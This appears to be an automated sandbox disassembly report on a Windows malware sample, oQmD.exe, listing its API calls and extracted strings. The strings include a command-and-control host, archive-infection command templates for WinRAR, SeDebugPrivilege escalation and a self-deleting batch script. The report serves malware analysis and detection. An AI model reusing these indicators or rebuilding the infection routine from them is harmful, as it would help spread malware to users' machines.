Part of subcall function 008029E2: memset.MSVCRT ref: 00802ADA
Part of subcall function 008029E2: FindFirstFileA.KERNEL32(?,?), ref: 00802AEF
Part of subcall function 008029E2: memset.MSVCRT ref: 00802B13

strrchr.MSVCRT ref: 00802959
lstrcmpiA.KERNEL32(00000001,exe), ref: 00802974

Strings

rar, xrefs: 00802988
%s\, xrefs: 0080293A
exe, xrefs: 0080296D
C:\Users\user\AppData\Local\Temp\, xrefs: 008029B3
%s%s, xrefs: 008028F1

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-3007274656
Opcode ID: e1de346a4cd810eb25e12e076f0f43463f7b589fa5f60e51739c0a5cfb3b9e80
Instruction ID: 35686137405efb1597267cf5054e28650ca8054405ba501005c7b47e57cf13ca
Opcode Fuzzy Hash: e1de346a4cd810eb25e12e076f0f43463f7b589fa5f60e51739c0a5cfb3b9e80
Instruction Fuzzy Hash: 26319172A4031D7BEBA0AB68DC8DFDA7B6CFB15314F050452F585E21C1E6F49AC48BA1

Function 00801638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0080164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0080165B
GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\oQmD.exe,00000104), ref: 0080166E
CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 008016AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 008016BD

Part of subcall function 0080139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\oQmD.exe), ref: 008013BC
Part of subcall function 0080139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 008013DA
Part of subcall function 0080139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00801448

lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\oQmD.exe), ref: 008016E5

Strings

C:\Users\user\AppData\Local\Temp\oQmD.exe, xrefs: 00801662, 00801667, 008016DD
Documents and Settings, xrefs: 00801696
C:\Users\user\AppData\Local\Temp\, xrefs: 00801644
C:\Windows\system32, xrefs: 00801656

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\oQmD.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-3826284983
Opcode ID: 92760773a3f63e355e4dcafb8d7ea9769a284a732bbc10d7c6a0cde1c8392572
Instruction ID: 4ad53883514e1ee2cf91958058c0d471e129e247e1d4feff85e44daa13b9c4e3
Opcode Fuzzy Hash: 92760773a3f63e355e4dcafb8d7ea9769a284a732bbc10d7c6a0cde1c8392572
Instruction Fuzzy Hash: B011E2B2642624BBDFE06BA9AD4EEAB3E6DFF11371F000015F309D10E0C6718940CBA2

Function 00801000 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,008010E8,?), ref: 00801018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75BF8400,?,http://%s:%d/%s/%s,008010E8,?), ref: 00801029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00801038
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,008010E8,?), ref: 0080104B
UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,008010E8,?), ref: 00801075
CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,008010E8,?), ref: 0080108B
CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,008010E8,?), ref: 0080108E

Strings

http://%s:%d/%s/%s, xrefs: 00801000
ddos.dnsnb8.net, xrefs: 00801026

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-3273462101
Opcode ID: 6715c0dc9c5b2d5c795afae7d1da00a5062ae5a620afa098509dfd4ee03af682
Instruction ID: ca0ae3b9e2ff16f606751a93a350ea6c7fd2ac3e50d935dddadc5b7a258fedea
Opcode Fuzzy Hash: 6715c0dc9c5b2d5c795afae7d1da00a5062ae5a620afa098509dfd4ee03af682
Instruction Fuzzy Hash: BE0184B160165CBFE7705F609C89E2BBBACFB447A9F004529F285E2490D6705E448B60

Function 00802C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00802C57

Part of subcall function 00801973: PathFileExistsA.SHLWAPI(00804E5C,00000000,C:\Users\user\AppData\Local\Temp\oQmD.exe), ref: 00801992
Part of subcall function 00801973: CreateFileA.KERNEL32(00804E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 008019BA
Part of subcall function 00801973: Sleep.KERNEL32(00000064), ref: 008019C6
Part of subcall function 00801973: wsprintfA.USER32 ref: 008019EC
Part of subcall function 00801973: CopyFileA.KERNEL32(00804E5C,?,00000000), ref: 00801A00
Part of subcall function 00801973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00801A1E
Part of subcall function 00801973: GetFileSize.KERNEL32(00804E5C,00000000), ref: 00801A2C
Part of subcall function 00801973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00801A46
Part of subcall function 00801973: ReadFile.KERNEL32(00804E5C,00804E60,00000000,?,00000000), ref: 00801A65

CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 00802C99
WaitForMultipleObjects.KERNEL32(00000001,008016BA,00000001,000000FF,?,008016BA,00000000), ref: 00802CAC
VirtualFree.KERNEL32(00AE0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\oQmD.exe,00804E5C,00804E60,?,008016BA,00000000), ref: 00802CC2

Strings

C:\Users\user\AppData\Local\Temp\oQmD.exe, xrefs: 00802C69

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user\AppData\Local\Temp\oQmD.exe
API String ID: 2042498389-4270170564
Opcode ID: b6e60a4d8f2262f9df5348034521c6c005132b1c6c667f32ac51228254bcb2e9
Instruction ID: 3d878c3d1bcf38f9c1e45d3571fdb9de19bde57d5c257375631e8a73262c305b
Opcode Fuzzy Hash: b6e60a4d8f2262f9df5348034521c6c005132b1c6c667f32ac51228254bcb2e9
Instruction Fuzzy Hash: 10018FB16812207AE790ABA5DC1EEAF7E6CFF01B60F104124BA15D62D1D6E49A00C7B1

Function 008014E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00801504
VirtualQuery.KERNEL32(008014E1,?,0000001C), ref: 00801525
ExitProcess.KERNEL32 ref: 0080157A

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 92cf91f2856dc334556de97e7d23272263f86d241d17b904824b214219154c47
Instruction ID: 9e8c75fa52044bce48880576005812ed92e0d71f0044e29328bbfc6e1533e55e
Opcode Fuzzy Hash: 92cf91f2856dc334556de97e7d23272263f86d241d17b904824b214219154c47
Instruction Fuzzy Hash: D5117CB1A81214DFCFA0EFA5AC89A7DB7BCFB94724B10502EF902DB190D2348941EB51

Function 00801915 Relevance: 4.5, APIs: 3, Instructions: 41
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00801933
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 00801947

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: FileTimememset
String ID:
API String ID: 176422537-0
Opcode ID: 6b26defb36f2b6db0d0c2472b03181f2e55caac48edec2a2d20bb73f86b40372
Instruction ID: a80b7b40405fd492de35822ac1dd5c86556c5337c128e7d12331a03041a33a1c
Opcode Fuzzy Hash: 6b26defb36f2b6db0d0c2472b03181f2e55caac48edec2a2d20bb73f86b40372
Instruction Fuzzy Hash: 19F04F36200609ABDBA09E26DC08AAB7BACFB50375F40853AF556D10E0E770E6458BA0

Function 00806159 Relevance: 2.6, APIs: 2, Instructions: 57
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 008060DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00806189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 008061A5

Memory Dump Source

Source File: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
Opcode ID: 31259e6c16633e21fbf7cb8a0f8e11d1700c4ed5b87076ac5cb492f94b97477b
Instruction ID: ba97c498bf5fca5e5047373ea5462284815ea710bb90210071ad1ae0608f4463
Opcode Fuzzy Hash: 31259e6c16633e21fbf7cb8a0f8e11d1700c4ed5b87076ac5cb492f94b97477b
Instruction Fuzzy Hash: F1116D32A00659CFCBB18F58CC817DD77A1FF05301F694519DD899B291EB712960CB94

Non-executed Functions

Function 0080119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\oQmD.exe,?,?,?,?,?,?,008013EF), ref: 008011AB
OpenProcessToken.ADVAPI32(00000000,00000028,008013EF,?,?,?,?,?,?,008013EF), ref: 008011BB
AdjustTokenPrivileges.ADVAPI32(008013EF,00000000,?,00000010,00000000,00000000), ref: 008011EB
CloseHandle.KERNEL32(008013EF), ref: 008011FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,008013EF), ref: 00801203

Strings

C:\Users\user\AppData\Local\Temp\oQmD.exe, xrefs: 008011A5

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user\AppData\Local\Temp\oQmD.exe
API String ID: 75692138-4270170564
Opcode ID: c1ee61c7cb4b7ec08ef9361d63b7e14a4cebfa6c182e329ae606aea020005615
Instruction ID: c4b936434c100883c9c5f46bf4179c86cd1c6085e81416a78839515f7536760d
Opcode Fuzzy Hash: c1ee61c7cb4b7ec08ef9361d63b7e14a4cebfa6c182e329ae606aea020005615
Instruction Fuzzy Hash: 3501E4B5901209EFDB40DFE4CD89AAEBBBCFB04305F104469E606E2291D7719F449B50

Function 0080139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\oQmD.exe), ref: 008013BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 008013DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00801448

Part of subcall function 0080119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\oQmD.exe,?,?,?,?,?,?,008013EF), ref: 008011AB
Part of subcall function 0080119F: OpenProcessToken.ADVAPI32(00000000,00000028,008013EF,?,?,?,?,?,?,008013EF), ref: 008011BB
Part of subcall function 0080119F: AdjustTokenPrivileges.ADVAPI32(008013EF,00000000,?,00000010,00000000,00000000), ref: 008011EB
Part of subcall function 0080119F: CloseHandle.KERNEL32(008013EF), ref: 008011FA
Part of subcall function 0080119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,008013EF), ref: 00801203

Strings

C:\Users\user\AppData\Local\Temp\oQmD.exe, xrefs: 008013A8
SeDebugPrivilege, xrefs: 008013D3

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user\AppData\Local\Temp\oQmD.exe$SeDebugPrivilege
API String ID: 4123949106-2058724520
Opcode ID: ec395dfc84d8cec14660ea143f5a0a453e2ee758d2cd96ca488e079f2f8e298f
Instruction ID: 99e6a39e43fb79baf416521458e6a0fc6e5c940de67c801890fbc68fb81b8da6
Opcode Fuzzy Hash: ec395dfc84d8cec14660ea143f5a0a453e2ee758d2cd96ca488e079f2f8e298f
Instruction Fuzzy Hash: 91313F71D00209EADFA0DBA58C49FEEBBB9FB44714F2041A9E504F3191D7749E45CB61

Function 0080239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 008023CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00802464
GetFileSize.KERNEL32(00000000,00000000), ref: 00802472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 008024A8
memset.MSVCRT ref: 008024B9
strrchr.MSVCRT ref: 008024C9
wsprintfA.USER32 ref: 008024DE
strrchr.MSVCRT ref: 008024ED
memset.MSVCRT ref: 008024F2
memset.MSVCRT ref: 00802505
wsprintfA.USER32 ref: 00802524
Sleep.KERNEL32(000007D0), ref: 00802535
Sleep.KERNEL32(000007D0), ref: 0080255D
memset.MSVCRT ref: 0080256E
wsprintfA.USER32 ref: 00802585
memset.MSVCRT ref: 008025A6
wsprintfA.USER32 ref: 008025CA
Sleep.KERNEL32(000007D0), ref: 008025D0
Sleep.KERNEL32(000007D0,?,?), ref: 008025E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 008025FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00802611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00802642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 0080265B
SetEndOfFile.KERNEL32 ref: 0080266D
CloseHandle.KERNEL32(00000000), ref: 00802676
RemoveDirectoryA.KERNEL32(?), ref: 00802681

Strings

%s\, xrefs: 0080257F
%s X -ibck "%s" "%s\", xrefs: 0080251E
-ibck, xrefs: 008025BA
C:\Users\user\AppData\Local\Temp\, xrefs: 008023B1, 008023B6, 008024CD
%s%s, xrefs: 008024D8
%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 008025C4

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
API String ID: 2203340711-2169341206
Opcode ID: 0933b9a970884ab119c46f5d77e06eafe13732c4e88fd38d0123c839e0bd2c75
Instruction ID: 3a26adb93c05fcaa3cfa64e82a373c975b8ab69bd29e6c7217606b9a6867f38a
Opcode Fuzzy Hash: 0933b9a970884ab119c46f5d77e06eafe13732c4e88fd38d0123c839e0bd2c75
Instruction Fuzzy Hash: AA81AFB1504304BBD790DF64DC49FABBBACFB88714F00451AF694D21D0D7B4DA498B66

Function 0080274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00802766
memset.MSVCRT ref: 00802774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00802787
wsprintfA.USER32 ref: 008027AB

Part of subcall function 0080185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00801118), ref: 00801867
Part of subcall function 0080185B: srand.MSVCRT ref: 00801878
Part of subcall function 0080185B: rand.MSVCRT ref: 00801880
Part of subcall function 0080185B: srand.MSVCRT ref: 00801890
Part of subcall function 0080185B: rand.MSVCRT ref: 00801894

wsprintfA.USER32 ref: 008027C6
CopyFileA.KERNEL32(?,00804C80,00000000), ref: 008027D4
wsprintfA.USER32 ref: 008027F4

Part of subcall function 00801973: PathFileExistsA.SHLWAPI(00804E5C,00000000,C:\Users\user\AppData\Local\Temp\oQmD.exe), ref: 00801992
Part of subcall function 00801973: CreateFileA.KERNEL32(00804E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 008019BA
Part of subcall function 00801973: Sleep.KERNEL32(00000064), ref: 008019C6
Part of subcall function 00801973: wsprintfA.USER32 ref: 008019EC
Part of subcall function 00801973: CopyFileA.KERNEL32(00804E5C,?,00000000), ref: 00801A00
Part of subcall function 00801973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00801A1E
Part of subcall function 00801973: GetFileSize.KERNEL32(00804E5C,00000000), ref: 00801A2C
Part of subcall function 00801973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00801A46
Part of subcall function 00801973: ReadFile.KERNEL32(00804E5C,00804E60,00000000,?,00000000), ref: 00801A65

DeleteFileA.KERNEL32(?,?,00804E54,00804E58), ref: 0080281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00804E54,00804E58), ref: 00802832

Strings

\WinRAR\Rar.exe, xrefs: 00802793
C:\Users\user\AppData\Local\Temp\, xrefs: 008027B6
C:\Windows\system32, xrefs: 008027E3
%s%.8x.exe, xrefs: 008027BB
c_31892.nls, xrefs: 008027DE
%s%s, xrefs: 008027A5
%s\%s, xrefs: 008027EE

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-3961832207
Opcode ID: deda80aa822abc545ecaa6124e76129712f38f3bd5596896894854e08207864f
Instruction ID: 1e2c0911365419433ac3e90bd0fb152c4bfdc72d09a42c678a08595211101d32
Opcode Fuzzy Hash: deda80aa822abc545ecaa6124e76129712f38f3bd5596896894854e08207864f
Instruction Fuzzy Hash: 9D2184F6A4121C7BEB90E7A49C89FDB776CFB04755F0005A1B754E21C1E6B4DF448AA0

Function 00801581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0080185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00801118), ref: 00801867
Part of subcall function 0080185B: srand.MSVCRT ref: 00801878
Part of subcall function 0080185B: rand.MSVCRT ref: 00801880
Part of subcall function 0080185B: srand.MSVCRT ref: 00801890
Part of subcall function 0080185B: rand.MSVCRT ref: 00801894

wsprintfA.USER32 ref: 008015AA
wsprintfA.USER32 ref: 008015C6
lstrlen.KERNEL32(?), ref: 008015D2
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 008015EE
WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00801609
CloseHandle.KERNEL32(00000000), ref: 00801612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0080162D

Strings

C:\Users\user\AppData\Local\Temp\oQmD.exe, xrefs: 0080158A, 008015B3, 008015B8, 008015B9
:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 008015C0
C:\Users\user\AppData\Local\Temp\, xrefs: 00801599
%s%.8x.bat, xrefs: 008015A4
open, xrefs: 00801627

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\oQmD.exe$open
API String ID: 617340118-4023058387
Opcode ID: a025d3363373106bd20063e57a38bfd8879b8c60e7ee2d547848d1b02fa2b6c6
Instruction ID: 70dc8e248d39c4a158bba5159bcd20d059b8ec4cd5a0e68ef873cf94e11c28a5
Opcode Fuzzy Hash: a025d3363373106bd20063e57a38bfd8879b8c60e7ee2d547848d1b02fa2b6c6
Instruction Fuzzy Hash: 0F1177B2A411287FD7A097A59C8DDEB7B6CFF59760F000051F659E2180DA749B848BB0

Function 0080120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00801400), ref: 00801226
GetProcAddress.KERNEL32(00000000), ref: 0080122D
GetCurrentProcessId.KERNEL32(?,?,?,?,00801400), ref: 0080123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00801400), ref: 00801250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\oQmD.exe,?,?,?,?,00801400), ref: 0080129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\oQmD.exe,?,?,?,?,00801400), ref: 008012B0
CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\oQmD.exe,?,?,?,?,00801400), ref: 008012F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00801400), ref: 0080130A

Strings

C:\Users\user\AppData\Local\Temp\oQmD.exe, xrefs: 00801262
ntdll.dll, xrefs: 00801219
ZwQuerySystemInformation, xrefs: 00801212

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
